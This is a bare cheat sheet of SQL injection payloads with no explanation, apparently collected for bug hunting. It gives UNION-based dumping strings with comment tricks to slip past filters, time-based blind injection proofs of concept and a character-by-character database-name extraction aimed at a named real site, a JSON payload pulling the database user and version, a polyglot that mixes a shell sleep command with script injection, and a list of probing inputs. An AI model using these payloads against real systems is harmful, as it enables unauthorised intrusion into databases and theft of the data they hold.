http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,2,3,4,5 —
DUPM DATABASE:
http://domain.com/REDACTED/news.php?id=13 AND 0 /*!50000UnIoN*/ /*!50000SeLeCt*/ 1,database(),3,4,5 —

Getting two states for boolean based sql injection
    Error - https://www.innogames.com/'
    No error - https://www.innogames.com/''
Crafted POC
    https://www.innogames.com/'xor(if(now()=sysdate(),sleep(10),0))or'
Advanced payload for data extraction
    https://www.innogames.com/'xor(if(mid(database(),1,1)=0x41,sleep(63),0))or'


\\yourhost?;sleep${IFS}10;'/*!90000or*/+/*"><%00svg/onload=confirm`{{8*8}}`>*/'1


&res_id=51-CASE/**/WHEN(LENGTH(​version()​)=​10​)THEN(SLEEP(6*1))END

:/php/widgets_handler.php?method=getResWidgetButton&res_id=51-CASE/**/WHEN(LENGTH(​version()​)=​10​)THEN(SLEEP(6*1))END


{"param":"11')))+UNION+SELECT+1,2,3,CONCAT(user(),version(),database()),5,6,7,8--+r0hack"}

'-if(1=2,'0','1')-'

/?q=1
/?q=1'
/?q=1"
/?q=[1]
/?q[]=1
/?q=1`
/?q=1\
/?q=1/*'*/
/?q=1/*!1111'*/
/?q=1'||'asd'||'  <== concat string
/?q=1' or '1'='1
/?q=1 or 1=1
/?q='or''='
' OR 1=1 /*
